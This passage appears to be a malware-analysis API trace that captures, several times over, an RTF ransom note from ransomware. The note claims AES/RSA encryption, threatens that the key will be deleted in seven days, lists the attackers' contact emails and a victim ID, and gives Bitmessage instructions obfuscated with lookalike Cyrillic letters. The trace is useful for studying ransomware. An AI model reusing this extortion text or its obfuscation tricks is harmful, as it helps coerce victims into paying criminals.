send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0281.857] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0281.857] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x1ed55a8, cbMultiByte=8717, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd.\\par\r\n2. \\f1\\lang1049\\'d3\\'ee\\f0\\lang1033 u must c\\f1\\lang1049\\'ee\\f0\\lang1033 nfirm th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n, r\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd f\\f1\\lang1049\\'ee\\f0\\lang1033 ll\\f1\\lang1049\\'ee\\f0\\lang1033 w th\\f1\\lang1049\\'e5\\f0\\lang1033 instructi\\f1\\lang1049\\'ee\\f0\\lang1033 ns th\\f1\\lang1049\\'e0\\f0\\lang1033 t w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n3. R\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 sit\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f1\\f0\\lang1033 lick \\f1\\lang1049 \"\\f0\\lang1033 L\\f1\\lang1049\\'ee\\f0\\lang1033 gin\\f1\\lang1049 \"\\f0\\lang1033 l\\f1\\lang1049\\'e0\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 r us\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_in }}{\\fldrslt{https://bitmsg.me/users/sign_in\\ul0\\cf0}}}}\\f0\\fs20 , \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd \\f1\\lang1049\\'e0\\f0\\lang1033 nd click th\\f1\\lang1049\\'e5\\f0\\lang1033 \"Sign in\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n. \\f1\\lang1049 \\f0\\lang1033\\par\r\n4. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"\\f1\\lang1049\\'d1\\f0\\lang1033 